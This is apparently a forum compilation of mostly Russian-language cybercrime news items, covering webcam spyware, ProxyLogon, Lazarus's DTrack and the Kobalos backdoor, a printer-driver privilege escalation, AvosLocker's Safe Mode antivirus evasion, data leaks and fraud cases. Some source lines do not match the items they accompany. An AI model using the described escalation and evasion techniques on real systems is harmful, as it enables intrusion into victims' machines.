source: justice[.]gov/usao-sdny/pr/co-founder-global-multimillion-dollar- cryptocurrency-ponzi-scheme-airbit-club
Британский хакер осужден за нарушение частной жизни сотен женщин.
60-летний Кристофер Тейлор, имеющий троих детей и больную жену, которой он ухаживал, жил в обычной семье из города Уиган, графство Большой Манчестер, Великобритания. Однако у него было необычное увлечение - подсматривать за другими людьми. С 2010 года он взламывал устройства по всему миру, привлекая жертв, размещая поддельные ссылки на порносайтах, которые позволяли ему получить полный доступ к функциям ноутбука, включая веб-камеру.
С помощью вредоносного программного обеспечения он входил в компьютеры жертв, пока они ели, занимались учебой и йогой. Он следил за женщинами, когда они переодевались или занимались сексом, попадая в объектив веб-камеры. Суд узнал, что после взлома устройств Тейлор записывал десятки своих ничего не подозревающих жертв ради собственного "сексуального удовлетворения". С 2010 по 2016 год он собрал 80 000 изображений и видео. Офицеры также обнаружили видео зоофилии, включая одно, на котором изображена женщина, занимающаяся сексом с собакой.
Расследование показало, что Тейлор также удалил тысячи файлов до своего ареста. Американские правоохранительные органы просили его экстрадировать в США для судебного разбирательства по обвинениям в мошенничестве и компьютерном преступлении, но их запрос был отклонен после того, как лондонский суд решил, что это негативно скажется на состоянии здоровья его больной жены. Полиция предъявила ему обвинения в конце прошлого года, спустя почти семь лет после начала расследования.
Нил Фрайман, обвинитель, заявил в суде: "Многие из этих изображений и видео запечатлели людей, которые едят, работают, лежат в постели и занимаются йогой. Однако на некоторых изображениях также видны люди в различных стадиях раздевания и занятия сексом".
Фрайман сказал, что Тейлор был пойман после того, как одна из жертв, студентка Джорджиинского технологического института, случайно скачала вредоносное ПО на свой ноутбук в аэрокосмической лаборатории колледжа. Вредоносное ПО было замечено сложными системами обнаружения шпионского ПО колледжа, и информация была отправлена в ФБР. В результате расследования в феврале 2016 года был проведен обыск дома Тейлора.
Тейлора быстро выследили и обыскали его дом. На его компьютере хранились фотографии и видео обнаженных жертв, а также акты зоофилии. Это послужило основанием для ареста. В результатеТейлор был осужден на один год и два месяца тюремного заключения.
source: manchestereveningnews.co.uk/news/greater-manchester-news/wigan-dad- found-bestiality-pictures-26721101
Эксперт обнаружил новый способ использования стандартного процесса установки драйверов принтера для получения привилегий системы.
Проблемы с драйверами печати в Windows по-прежнему являются головной болью как
для пользователей, так и для самой компании Microsoft.
В прошлом месяце исследователи безопасности случайно
опубликовали PoC-эксплоит для
уязвимости в сервисе печати Windows Print Spooler, получившей название
PrintNightmare (
CVE-2021-34527 ).
Microsoft выпустила исправление
для проблемы, но исследователи безопасности
сочли его недостаточно
эффективным. В свою очередь, компания заявила, что патч работает как положено,
а исследователи использовали параметры реестра, несоответствующие ее
официальной документации.
Однако страсти вокруг драйверов печати в Windows все еще не утихают. Так,
создатель Mimikatz Бенжамин Делпи (Benjamin Delpy)
обнаружил новый
способ использования стандартного процесса установки драйверов принтера для
получения привилегий системы. Для этого атакующий должен создать вредоносный
драйвер принтера и подписать его с помощью доверенного сертификата
Authenticode, следуя официальной инструкции Microsoft. Подписанные вредоносные
драйверы затем могут устанавливаться на любое подключенное к Сети устройство,
где у них есть привилегии администратора.
Далее злоумышленники могут использовать это «поворотное» устройство для
получения привилегий системы на других устройствах, где у них нет повышенных
привилегий, просто установив вредоносный драйвер, как показано на видео ниже.
Способ работает даже в случае, если на системе развернуты рекомендованные
Microsoft механизмы, разрешающие установку драйверов только с правами
администратора.
Хотя вышеупомянутый способ повышения привилегий не относится к PrintNightmare,
по мнению Делпи, похожие проблемы с установкой драйверов принтера могут
классифицироваться под одним и тем же названием.
Источнике: https://www.securitylab.ru/news/522374.php
Прошло чуть больше года с момента ликвидации сайта WeLeakInfo[.]com, попавшего в поле зрения ФБР. За время своего существования проект успел продать доступ более чем к 12 миллиардам имён пользователей и паролей. Теперь же представители WeLeakInfo по иронии судьбы допустили утечку данных своих клиентов.
Как сообщил Брайан Кребс, повторная регистрация домена позволила некоему злоумышленнику украсть и опубликовать информацию о 24 тыс. клиентов WeLeakInfo, которые оплачивали банковскими картами доступ к скомпрометированным учётным данным.
Последние несколько лет площадка WeLeakInfo по праву считалась одним из крупнейших источников взломанных паролей. Например, прокуроры отмечали, что проект располагает более 10 000 утечек, в которых фигурировали более 12 млрд записей.
WeLeakInfo предоставлял платный доступ к реальным именам, адресам электронной почты, логинам, телефонным номерам и паролям. Всех этих сведений вполне хватало, чтобы получить полный контроль над учётной записью ничего не подозревающего пользователя.
Покупатели даже могли ввести адрес электронной почты и посмотреть, какие аккаунты оформлены на него. Или, например, ввести пароль и посмотреть, к каким учёткам он подходит.
Однако теперь клиентов WeLeakInfo настигла та же участь. Данные около 24 тыс. покупателей взломанных аккаунтов просочились в Сеть. Их опубликовал на форуме Raidforums пользователь под ником «pompompurin».
Как пояснил сам pompompurin, ему удалось добраться до информации после того, как срок действия одного из доменов WeLeakInfo подошёл к концу. ФБР упустило это из виду, а находчивому исследователю удалось зарегистрировать этот домен заново.
Специалисты Flashpoint изучили размещённую базу данных и отметили, что та частично включает данные банковских карт клиентов WeLeakInfo, а также их полные имена, адреса электронной почты, телефонные номера и даже адреса проживания.
• Source: krebsonsecurity[.]com/2021/03/weleakinfo-leaked-customer-payment- info/
• Source: justice[.]gov/usao-dc/pr/weleakinfocom-domain-name-seized
На прошлой неделе инженеры Microsoft выпустили внеплановые патчи для четырех уязвимостей в почтовом сервере Exchange, которым исследователи дали общее название ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065). По сути, эти уязвимости можно объединить в цепочку, а их эксплуатация позволит злоумышленнику пройти аутентификацию на сервере Exchange, получить права администратора, установить малварь и похитить данные.
Схема атаки ProxyLogon
Еще неделю назад сообщалось, что свежие уязвимости уже находятся под атаками, за которыми стоит китайская хакерская группа Hafnium. Однако после того как информация о багах была разглашена, к атакам на Exchange присоединились и другие злоумышленники.
Например, аналитики ESET пишут, что к атакам подключились APT LuckyMouse, Tick и Calypso, а также другие, «еще не классифицированные» группировки.
Специалисты Red Canary сообщают, что проблемы ProxyLogon используются как минимум одной группировкой для доставки веб-шеллов на зараженные серверы, а затем установки майнинговой малвари DLTminer
Атаки со стороны нескольких преступных групп также подтверждены и экспертами Microsoft, которые обновили свое исходное сообщение об активности Hafnium.
Хуже того, по данным Wired и KrebsOnSecurity, в настоящее время хакеры уже не выбирают жертв, а попросту ищут в сети и атакуют любые уязвимые серверы Exchange. В итоге, по информации СМИ, от этих атак уже пострадали от 30 000 до 100 000 компаний и организаций, и это число лишь продолжает расти. Эксперты опасаются, что в итоге эти атаки могут вылиться во что-то гораздо худшее, а многочисленные веб-шеллы в будущем используют для массового хищения данных, вымогательства и даже распространения шифровальщиков.
Бывший глава Агентства по кибербезопасности и защите инфраструктуры, организованного при Министерстве внутренней безопасности США (DHS CISA), Крис Кребс говорит, что правительственные учреждения и малый бизнес страдают от этих атак больше, чем крупные предприятия. В Twitter он отмечает, что у групп реагирования на инциденты сейчас настали очень тяжелые времена, а хуже всего приходится сектору образования, а также местным органам власти.
__https://twitter.com/x/status/1368004411545579525
Среди крупных пострадавших организаций уже числятся Министерство труда и социальных дел в Чехии и почтовые отделения в Праге, а также Европейское банковское управление.
Многие страны (в том числе Австралия, Великобритания, Германия, Румыния, Австрия, Швеция, Финляндия, Испания, Новая Зеландия, Франция, Сингапур, Венгрия, Ирландия, Канада и Италия) выпустили предупреждения на уровне национальной безопасности, где предупреждают компании и правительственные организации об угрозе и просят всех как можно скорее установить патчи.
Учитывая всю серьезность ситуации, помимо обычных патчей инженеры Microsoft подготовили исправления для старых и неподдерживаемых версий Exchange, а также выпустили специальный PowerShell-скрипт, предназначенный для проверки серверов Exchange на предмет взлома и известных индикаторов компрометации (веб-шеллов). Аналогичный скрипт был представлен и командой CERT-Latvia.
Кроме того, в минувшие выходные Microsoft обновила Microsoft Support Emergency Response Tool (MSERT), чтобы инструмент мог обнаруживать признаки вторжений на серверы, где не установлен Microsoft Defender и которые не могут автоматически обнаруживать атаки ProxyLogon.
__https://twitter.com/x/status/1368347292189696001
В свою очередь, специалисты PwnDefend подготовили список IP-адресов, связанных со сканированием и взломами почтовых серверов Exchange за последние несколько недель.
Источник: xakep.ru/2021/03/09/proxylogon/
Протокол децентрализованных финансов Thala, созданный на основе блокчейна Aptos, подвергся хакерской атаке, из-за которой из пулов ликвидности были выведены криптоактивы на $25,5 млн. Хакер вернул украденное за вознаграждение $300 000.
Специалисты Thala подтвердили, что 15 ноября платформа пострадала из-за уязвимости в контрактах на фарминг старой версии v1. Эксплойт позволил неизвестному вывести токены на $25,5 млн, после чего Thala приостановила все затронутые контракты, заморозив токены MOD на $9 млн и THL на $2,5 млн.
Команда платформы обратилась к группам по восстановлению украденных криптоактивов — SEAL 911 и Ogle Security Group. Они помогли идентифицировать хакера за несколько минут, узнав имя и адрес. Разработчикам Thala удалось договориться со взломщиком о возврате всех украденных средств за вычетом $300 000, которые тот оставил себе в качестве вознаграждения за обнаружение бага.
«От пострадавших пользователей не требуется совершать никаких дальнейших действий, их средства будут восстановлены на 100%. Однако все затронутые контракты и интерфейс Thala приостановлены до тех пор, пока мы не убедимся в их полной безопасности», — объявила команда протокола.
Thala Labs предоставляет автоматизированный маркетмейкер и приносящий доходность стейблкоин для экосистемы Aptos — Move Dollar (MOD). По данным DefiLlama, протокол занимает четвертое место по общей стоимости заблокированных активов (TVL) среди всех DeFi-протоколов на основе Aptos.
Московский городской суд признал виновным в совершении государственной измены в пользу США Дадобоева Фируза Темирбоевича, 1977 г.р., IT-специалиста одной из столичных коммерческих фирм, имеющего двойное гражданство. Решением суда он приговорен к 13 годам и 6 месяцам лишения свободы с отбыванием наказания в колонии строгого режима и штрафу в размере 300 тысяч рублей.
Установлено, что Дадобоев Ф.Т., располагая сведениями, полученными незаконным путем и составляющими государственную тайну, руководствуясь преступным умыслом, намеревался передать их представителю американской разведки. В этих целях установил контакт с ЦРУ.
По результатам проведенных оперативно-разыскных мероприятий в октябре 2022 года при попытке передачи собранных секретных материалов Дадобоев Ф.Т. был задержан сотрудниками ФСБ России.
Следственным управлением ФСБ России возбуждено и расследовано уголовное дело по ст. 275 УК России (Государственная измена).
Дадобоев Ф.Т. свою вину признал и раскаялся в содеянном.
Приговор в законную силу не вступил.
Согласно [отчету Лаборатории Касперского](https://178.63.43.119/dtrack- targeting-europe-latin- america/107798/?web_view=true&__cpo=aHR0cHM6Ly9zZWN1cmVsaXN0LmNvbQ) , вредоносное ПО DTrack, используемое группировкой Lazarus, получило обновление и распространилось по всему миру.
Бэкдор DTrack впервые был обнаружен в 2019 году и нацелен на финансовые и энергетические организации, а также на банкоматы. DTrack позволяет киберпреступникам:
Спустя 3 года DTrack получил обновления и теперь он прячется внутри исполняемого файла с сильно запутанным кодом, который выглядит как легитимная программа. После извлечения полезной нагрузки (DLL), она загружается в «explorer.exe» с помощью обработки процесса, чтобы избежать обнаружения.
Обфусцированный код исполняемого файла
Еще одно небольшое изменение заключается в том, что вместо 6-ти C&C-серверов
используются 3. Кроме того, теперь доменные имена, используемые для
C&C-серверов, содержат в себе цвета и названия животных.
Исследователи Лаборатории Касперского обнаружили активность DTrack в Германии,
Бразилии, Индии, Италии, Мексике, Швейцарии, Саудовской Аравии, Турции и США,
что указывает на то, что DTrack распространяется на разные части мира.
Целевыми секторами являются образование, химическое производство,
государственные исследовательские центры и политические организации, а также
поставщики IT-услуг, коммунальных услуг и телекоммуникаций.
Ранее Microsoft заявила, что группировка Lazarus троянизирует ПО с открытым
исходным кодом и использует его для создания
бэкдоров
в организациях из сферы технологий, обороны и медиа-развлечений. Microsoft
подробно описала, как хакеры используют открытое ПО и поддельные предложения о
работе, чтобы обмануть разработчиков и IT-специалистов.
Жительница Алтайского края предложила временное жилье в Харькове жителю Тюмени. Теперь она — фигурантка уголовного дела о «незаконном вооружённом формировании». Об этом сообщают источники ASTRA.
Как следует из материалов дела, жительница Бийска Алина П. написала личное сообщение в телеграмме жителю Тюмени Максиму Б. В нем девушка, которая в данный момент проживает в Украине, предложила парню помощь — временное жилье в Харькове. И, якобы, передала молодому человеку некие контакты для связи с «людьми, которые помогут вступить ему в ряды «Добровольческого украинского корпуса».
Теперь, по материалам личной переписки в мессенджере, на гражданку РФ возбудили дело «о пособничестве к приготовлению к участию в незаконном вооружённом формировании на территории иностранного государства». Дело было возбуждено 17 ноября сотрудниками ЦПЭ МВД при содействии ФСБ Белгородской области по ч. 5. ст. 33, ч. 1 ст. 30 ч. 2 ст. 208 УК РФ.
На каком основании сотрудники ЦПЭ и ФСБ читали личную переписку двух граждан РФ — неизвестно.
source:https://t.me/astrapress/16034
source: https://roskomsvoboda.org/post/ugolovka-po-perepiske-telegram
АФМ Казахстана выявило нелегальную ферму для добычи криптовалют на территории производственной базы в городе Темиртау.
Устройства располагались в металлических контейнерах.
В ходе обысков на объекте обнаружены и изъяты 156 ASIC-майнеров и другие комплектующие устройства.
Ведется досудебное расследование.
С начала 2024 года ведомство выявило 11 фактов организации незаконных майнинговых ферм, общая сумма преступного дохода которых составила почти 440 млн тенге (свыше $839 600). В ходе расследования арестовано оборудование на сумму 269 млн тенге (~$513 300), а также цифровые активы на 373 млн тенге (~$711 800).
Только по двум уголовным делам, направленным в суд, общий преступный доход составил 216 млн тенге (~$412 200). В рамках этих дел арестовано имущество стоимостью 1,1 млрд тенге ($2,09 млн) и цифровые активы более чем на 30 млн тенге (~$57 200).
Tether обнародовала письма членам Комитета Сената США по банковскому делу и Комитету по финансовым услугам Палаты представителей США.
В этих письмах крупнейшая криптокомпания всеми руками за борьбу с отмыванием денег. И главное: компания готова сотрудничать со всеми спецслужбами мира, включая ЦРУ, МИ-6, и всех, всех, всех.
Я почти уверен, что их просто поставили перед выбором: либо сотрудничаете, либо закрываем вашу шарагу. Оснований-то хоть отбавляй, самые популярные: инструмент для обхода санкций или финансирования арабских ваххабитов.
sc: cryptobrokers.ru/tether-opublikovala-pisma-otpravlennye-v-komitet-senata- ssha-podrobnosti
Перед подключением проверяйте сервера

CRYPTOCURRENCY FROM SYSTEMS ](https://ethicaldebuggers.com/nicominer/)
“NICO JIANG” – FROM A SMALL CRACKING TOOLS' AUTHOR TO A MINER AUTHOR We all are adapting ourselves to the new normal where virtuality is the only way f
 ethicaldebuggers.com
Контрабандисты, возившие в Эмираты наличные в чемоданах, летали в Дубай
бизнес-классом, что позволяло им брать больше багажа с собой. Курьерам платили
$6,4 тыс. за каждую поездку в крипто.
Мехди Амроллахбибиюки и Али Аль-Наваб (Фото: nationalcrimeagency.gov.uk)
В Лондоне осудили еще двух членов сети контрабандистов по делу об отмывании £100 млн ($127,5 млн), сообщается на сайте Национального агентства по борьбе с преступностью. Всего были разоблачены 16 членов сети, которые переправляли наличные из Великобритании в ОАЭ.
11 января суд вынес обвинительные приговоры двум жителям Лондона — 40-летнему
Али Аль-Навабу и 41-летнему Мехди Амроллахбибиюки. Они входили в сеть, которая
с ноября 2019 года по октябрь 2020 года провезла контрабандой более £104 млн,
совершив 83 перелета из Лондона в Дубай.
8 марта им вынесут окончательный вердикт.
Сеть собирала деньги преступных группировок по всей Великобритании, полученные ими от торговли наркотиками. Затем в снятых для этого лондонских квартирах наличные помещали в вакуумную упаковку и раскладывали по чемоданам. Каждый обычно содержал около £400 тыс. и весил около 40 кг. Чемоданы затем обрызгивали кофе или освежителями воздуха, чтобы деньги не нашли собаки-ищейки на границе, после чего их переправляли в ОАЭ.
Главарь сети, 48-летний Абдулла Альфаласи, еще в июле 2022 года был приговорен к девяти годам заключения. Информация из его телефона доказывает, что Аль- Наваб и Амроллахбибиюки были курьерами, перевозившими наличные в чемоданах на самолетах. Они летали бизнес-классом, что позволяло им брать больше багажа с собой. Курьерам платили до £5 тыс. ($6,4 тыс.) за каждую поездку. Между собой они общались в нескольких группах WhatsApp.
Амроллахбибиюки был задержан в своем доме в апреле прошлого года. Он трижды путешествовал на самолете в Дубай в феврале и марте 2020 года, зарегистрировав в качестве багажа 12 чемоданов с £4,3 млн ($5,5 млн) внутри. Согласно данным из его телефона, он также отвечал за подсчет и упаковку денег на общую сумму £11,1 млн, которые были перевезены за восемь поездок им и другими курьерами.
Аль-Наваб был задержан в мае 2022 года, когда он пытался уехать из Великобритании в Турцию. В марте 2020 года он совершил две поездки, сдав в багаж девять чемоданов с £3,2 млн внутри.
sc: nationalcrimeagency.gov.uk/news/two-more-convictions-in-100-million-cash- in-suitcases-conspiracy
out a whole lot of valuable information.
Kyoto University, a top research institute in Japan, recently lost a whole bunch of research after its supercomputer system accidentally wiped out a whopping 77 terabytes of data during what was supposed to be a routine backup procedure.
That malfunction, which occurred sometime between Dec. 14 and Dec. 16, erased approximately 34 million files belonging to 14 different research groups that had been using the school’s supercomputing system. The university operates [Hewlett Packard Cray](https://www.extremetech.com/computing/291586-hp- enterprise-buys-cray-for-1-3b) computing systems and a DataDirect ExaScaler storage system—the likes of which can be utilized by research teams for various purposes.
It’s unclear what kind of files were specifically deleted or what caused the actual malfunction, though the school has said that the work of at least four different groups will not be able to be restored.
BleepingComputer, which originally reported on this incident, helpfully points out that supercomputing research is, uh, not super cheap, either—costing somewhere in the neighborhood of hundreds of dollars per hour to operate.
Kyoto, which is one of the most [highly- regarded](https://www.altair.com/customer-story/Kyoto-University/Kyoto- University-provides-high-performance-computing) schools in Japan and receives significant grants and funding, originally published details about its unfortunate incident in mid-December.
“Dear Supercomputing Service Users,” the post begins (translated to English via Google). “Today, a bug in the backup program of the storage system caused an accident in which some files in / LARGE0 were lost. We have stopped processing the problem, but we may have lost nearly 100TB of files, and we are investigating the extent of the impact.”
Supercomputing differs from normal computing due largely to its speed and its ability to leverage multiple computer systems to process complex mathematical calculations. Its advantages over normal computing make it a valuable tool for research into [a whole range of areas](https://fedtechmagazine.com/article/2021/12/oak-ridges-supercomputers- help-scientists-conduct-unique-research), including climate and atmospheric modeling, [physics](https://www.scientificamerican.com/article/how- supercomputers-will-yield-a-golden-age-of-materials-science/), vaccine science, and everything in between. Unfortunately, all of that is meaningless if your machine fails to work properly.
Original source: <https://gizmodo.com/university-loses-valuable-supercomputer- research-after-1848286983>
Среди программ-вымогателей появился новичок — AvosLocker, который отметился интересным методом обхода антивирусных средств. Исследователи из компании Sophos с лета наблюдали за операторами AvosLocker и теперь делятся выводами.
Что отличает AvosLocker от других шифровальщиков — использование инструмента для удалённого администрирования AnyDesk. Причём вредоносная программа запускает его в безопасном режиме Windows (Safe Mode).
Стоит отметить, что безопасным режимом Windows до этого пользовались такие семейства вымогателей, как REvil, Snatch и BlackMatter. Именно так они пытались отключить антивирусные средства и обойти инструменты администрирования.
Как [отметили](https://www.sophos.com/en-us/press-office/press- releases/2021/12/avoslocker-ransomware-uses-anydesk-in-safe-mode-to-launch- attacks.aspx) специалисты Sophos, многие продукты для защиты конечных точек не запускаются в безопасном режиме, особенно это касается режима диагностики, в котором Windows отключает большинство сторонних драйверов и софта в целом.
AnyDesk, который используют операторы AvosLocker, стал популярной альтернативой TeamViewer в киберпреступной среде. Запустив AnyDesk в Safe Mode и имея подключение к Сети, злоумышленники могут получить контроль над атакованным устройством.
[В блоге Sophos](https://news.sophos.com/en-us/2021/12/22/avos-locker- remotely-accesses-boxes-even-running-in-safe-mode/) также утверждается, что системному администратору потребуется физический доступ к заражённому компьютеру, чтобы справиться с последствиями атаки AvosLocker.
“Кибер-рыбак” из Литвы обокрал компании Google и Facebook на 120 млн долларов
В федеральной прокуратуре Южного округа штата Нью-Йорк с чувством глубокого удовлетворения сообщили, что 19 декабря манхэттенский федеральный судья Джордж Дэниелс приговорил 51-летнего гражданина Литвы Эвалдаса Римашаускаса к 60 месяцам лишения свободы и двум годам административного надзора после освобождения, а также к выплате 49,738,559 долларов и 41 цента в погашение ущерба и к 26,479,074 долларам и 24 центам штрафа.
Литовские власти арестовали Римашаускаса 16 марта 2017 года в его вильнюсском
доме по ордеру манхэттенского федерального судьи, и тогда в местных СМИ
сообщалось, что его жена гражданка Беларуси, а сам он долго жил в Латвии и
России. На этом основании Вильнюсский окружной суд избрал в отношении Эвалдаса
Римашаускаса меру пресечения в виде содержания под стражей. 20 июля 2017 года
тот же суд вынес решение о его экстрадиции, и 16 августа того же года его
доставили в Нью-Йорк, где поместили в манхэттенскую федеральную тюрьму MDC, в
которой он с тех пор содержится.
Римашаускаса обвинили в в кибермошенничестве, краже личных данных и отмывании
больше 120 млн долларов. Пострадавшие по его вине американские компании
значатся в деле как “Victim-1” и “Victim-2”. В манхэттенском суде он, говоря
по-русски через переводчика, не признал себя виновным, а его адвокат Роберт
Пибоди заявил, что “мы намерены следовать ходу дела и гарантировать
[подсудимому] надежную защиту”. Обвинение грозило Эвалдасу Римашаускасу
лишением свободы на срок до 30 лет, но 20 марта 2019 года он по соглашению с
прокуратурой признал себя виновным в одном эпизоде компьютерного мошенничества
с переводами и в итоге получил в шесть раз меньше. Приговор был назначен на 24
июня, но судья Дэниелс перенес его на 19 декабря. После Пибоди адвокатом
Римашаускаса стал Пол Петрос, а обвинение представляли помощники
манхэттенского федерального прокурора Юн Янь Чой и Ольга Зверович.
Комментируя приговор, прокурор Южного округа Джеффри Берман заявил, что подсудимый “создал дерзкую схему хищения у компаний США больше 120 млн долларов, а затем переправлял эти деньги на банковские счета по всему свету. Римашаускас занимался своими высокотехнологичными кражами посреди земного шара, но в тюрьму его посадили здесь, в манхэттенском федеральном суде”. Судя по признанию вины, с 2013 по 2015 год Эвалдас Римашаускас проводил действительно смелую аферу, которая у компьютерщиков называется “фишинг”, но не рыбная ловля “fishing”, а интернет-мошенничество “phishing”, путем которого воры XXI века получают доступ к конфиденциальным данным пользователей – логинам и паролям. Обычно такие “кибер-рыбаки” рассылают электронные письма от имени популярных брендов или банков, а также личные сообщения внутри различных сервисов и социальных сетей. Выйдя на клюнувшего пользователя, мошенники получают его данные, которые, в свою очередь, дают им доступ к его банковским счетам.
В предъявленном Римашаускасу обвинении утверждалось, что таким способом он с 2013 по 2015 год “выудил” больше 120 млн долларов, выдавая себя за представителя крупной азиатской фирмы (Company-1), которая производит компьютерное обеспечение для компаний в Силиконовой долине в Калифорнии. Для этого Римашаускас открыл и зарегистрировал в латвийском городе Даугавпилс корпорацию с уставным капиталом в один евро, но почти с точно таким же названием (Company-2). По уточненным прибалтийскими СМИ данным, эта компания называлась Quanta Computer Inc SIA и была зарегистрирована 5 августа 2013 года неким Владимиром А., 1980 года рождения, жителем Даугавпилса. Через 10 дней Владимир А. продал свою компанию Эвалдасу Римашаускасу, и ровно через месяц досрочно погасил финансовой компании GE Money долг в сумме 15 тыс. долларов за автомобиль Renault Master. Владельцем «одноевровой» Quanta Computer Inc SIA Римашаускас оставался до 19 января 2016 года, затем им стал латвиец Максим С., 1979 года рождения, при котором основной капитал был увеличен до 3 тыс. евро. В ноябре 2018 года владельцем фирмы стала рижская компания Relocate Investment SIA.
На имя этой компании-пустышки Римашаускас открыл счета в банках Латвии и Кипра, а позже в банках Литвы, Словакии, Венгрии и Гонконга. Сообщив о его аресте в Вильнюсе, министерство юстиции США уточнило, что Римашаускас “обманул две крупные технологические компании”, но их не назвало, ограничившись тем, что он сумел обмануть сотрудников этих компаний и банки, “убедив их переводить крупные суммы на его счета”. Для успеха своего предприятия он подделывал счета, контракты и деловые письма, якобы составленные и подписанные руководящими сотрудниками и представителями пострадавших компаний. Эти подделки на бланках компаний с печатями их корпораций предоставлялись в банки для получения крупных сумм, которые переводами шли на банковские счета “рыболова” Римашаускаса.
Через месяц после его ареста, а точнее 27 апреля 2017 года, корреспондент журнала Fortune Джефф Робертс опубликовал результаты собственного расследования, установив, что пострадавшими компаниями были интернет-гиганты Google и Facebook, а “азиатская компания”, за которую Римашаускас выдавал свою “пустышку”, зарегистрирована на Тайване и называется Quanta Computer. Компания Google заявила, что “мы установили эту аферу с коллективами наших менеджеров и быстро оповестили власти”, а компания Facebook от комментариев отказалась, но сообщила, что почти все похищенные деньги установлены и ведется совместное расследование с властями. Комментируя экстрадицию Эвалдаса Римашаускаса, начальник нью-йоркского отделения ФБР Уильям Суини признал, что этот русскоязычный литовец хитроумно присвоил больше 100 млн долларов, но “в итоге его следы привели следователей к истине, и сегодня мы обнародуем его ложь”. Суини добавил, что “в Интернете совершаются самые разные преступления, и проникновения в базы данных уже оказало негативное воздействие на различные индустрии”, но “ФБР продолжит работу с нашими и международными партнерами для преследования преступников, которые этим занимаются”.
Возможно, что гуманному приговору судьи Дэниелса, способствовало письмо адвоката Пола Петроса, направленное 5 ноября 2019 года в ответ на письмо федеральной прокуратуры от 18 сентября. Прокуратура, изложив свои аргументы, просила судью Дэниелса, придерживаясь Уложения о наказаниях, приговорить Эвалдаса Римашаускаса к “значительному сроку лишения свободы, но не больше необходимого и в пределах общих мер предупреждения преступлений”. Прокуратура не возражала против того, чтобы в приговор был включен срок, который Римашаускас отсидел в литовской тюрьме до экстрадиции. На трех страницах ответного письма, добрая треть которого замазана черной тушью, адвокат Петрос обратил внимание судьи, что прокуратура, среди прочего, обвиняет его клиента в том, что он открывал и контролировал банковские счета, через которые проходили украденные деньги, а также предоставлял поддельные документы. Это не так, написал Пол Тетрос, его клиент “не занимался «фишингом» (phishing), так как не знал, как это делается. Прокуратура утверждает, что, как заключил латвийский окружной суд, компания Victim-1 стала жертвой мошенничества, но все потерянные деньги были ей возвращены, а по ходу расследования подсудимому разрешили выезжать за границу. Фактически он не совершал уголовных преступлений ни в Литве, ни в Латвии”.
Утверждение манхэттенской федеральной прокуратуры, будто Римашаускас “играл ключевую роль отмывщика денег в составлении мошенниками деловой переписке”, адвокат Петрос опровергает тем, что Эвалдас не говорит, а тем более не пишет по-английски и, вообще, он простой литовский парень. Что же касается “общих мер предупреждения преступлений”, отметил адвокат, то компания Facebook не сообщила своим акционерам о каких-либо потерях, а утверждение, будто подсудимый “мог легко получить миллионы долларов за короткий отрезок времени”, отнюдь не значит, что он создал эту аферу или владеет еще не обнаруженными деньгами. Адвокат также написал, что Римашаускас работал на стройке, сильно выпивал и нуждался в деньгах, но никак не мог придумать такую аферу, не говоря уже о том, чтобы руководить ею. На этом основании адвокат Пол Петрос попросил судью Джорджа Дэниелса приговорить Эвалдаса Римашаускаса к сроку лишения свободы “значительно ниже” предусмотренного Уложением о наказаниях, и похоже, судья пошел ему навстречу. Со дня ареста в Вильнюсе 17 марта 2017 года Римашаускас уже отбыл половину назначенных ему 5 лет, 15% которых могут быть сняты за примерное поведение.
Аналитики компании ESET рассказали о бэкдоре Kobalos, который нацелен на кластеры для высокопроизводительных вычислений по всему миру. Малварь отличается небольшим размером (изученные образцы «весили» всего 25 Кб) и способна атаковать Linux, FreeBSD и Solaris, а также, вероятно, представляет опасность для Windows- и AIX-систем.
Первая известная жертва малвари была обнаружена в конце 2019 года, но ESET заявляет, что малварь оставалась активной в течение всего 2020 года. Многие из скомпрометированных Kobalos систем были суперкомпьютерами и серверами в академическом и исследовательском секторах. Также в числе жертв малвари неизвестный поставщик ПО из Северной Америке, крупный интернет-провайдер в Азии, маркетинговые агентства и хостинг-провайдеры.

К сожалению, исследователям не удалось выявить изначальный вектор атаки, который позволил хакерам получить административный доступ к системам жертв для установки Kobalos. Но, судя по всему, проблема заключалась в том, что многие из скомпрометированных систем работали со старыми, неподдерживаемыми или непропатченными ОС и софтом.
Также не удалось установить, какие цели преследовали операторы Kobalos, так как у исследователей отсутствовал пейлоад для изучения. Суперкомпьютеры нередко атакуют с целью майнинга криптовалюты, однако не в этом случае. Известно лишь, что Kobalos дает своим операторам удаленный доступ к файловой системе и может выполнять произвольные команды через терминал.
«На скомпрометированных машинах, системные администраторы которых смогли провести расследование, был обнаружен троянизированный клиент OpenSSH, похищавший учетные данные SSH. Файл /usr/bin/sshfile был заменен модифицированным исполняемым файлом, который фиксировал имя пользователя, пароль и имя целевого хоста, а затем записывал эти данные в зашифрованный файл», — отмечают эксперты.
Click to expand...
В целом ESET характеризует Kobalos как классический бэкдор, при помощи которого можно получить удаленный доступ к файловой системе, запустить шелл, выполнять произвольные команды, а также использовать зараженное устройство в качестве прокси. Кроме того, Kobalos позволяет превратить любой взломанный хост в C&C-сервер.

«Намерения авторов этой малвари до сих пор неизвестны. Мы не нашли никаких улик, указывающих на то, что они воруют конфиденциальную информацию, преследуют денежную выгоду или интересуются чем-то еще», — заключают исследователи.
Click to expand...
Источник: xakep.ru/2021/02/03/kobalos/
Аналитики ESET Дениз Джусто Билич (Denise Giusto Bilić) и Сесилия Пасторино (Cecilia Pastorino) изучили несколько «умных» устройств для взрослых и пришли к выводу, что с точки зрения безопасности, к сожалению, даже новые модели таких девайсов по-прежнему представляют собой весьма печальное зрелище.
Основное беспокойство исследователей связано с тем фактом, что носимые устройства и «умные» секс-игрушки оснащены многочисленными функциями, включая доступ в интернет и поддержку Bluetooth, доступ к онлайн-конференциям и мессенджерам. Все это открывает большие возможности для злоумышленников, желающих атаковать подобные девайсы.
[](https://xakep.ru/wp- content/uploads/2021/03/342852/Figure-1_-Architecture-of-a-smart-sex-toy.jpg)
Эксперты пишут, что большинство «умных» устройств имеют два основных канала связи. Так, связь между пользователем смартфона и самим устройством осуществляется через Bluetooth Low Energy (BLE), когда пользователь запускает приложение секс-игрушки. Тогда как связь между удаленным сексуальным партнером и приложением, управляющим устройством, осуществляется через интернет.
Для реализации этих функций «умные» секс-игрушки, как и любое другое IoT- устройство, используют API эндпойнты, обрабатывающие запросы.
«В некоторых случаях эта облачная служба также выступает в качестве посредника между партнерами, использующими такие функции, как чат, видеоконференцсвязь и передача файлов, или даже предоставление удаленного управления устройством партнеру», — гласит отчет.
Click to expand...
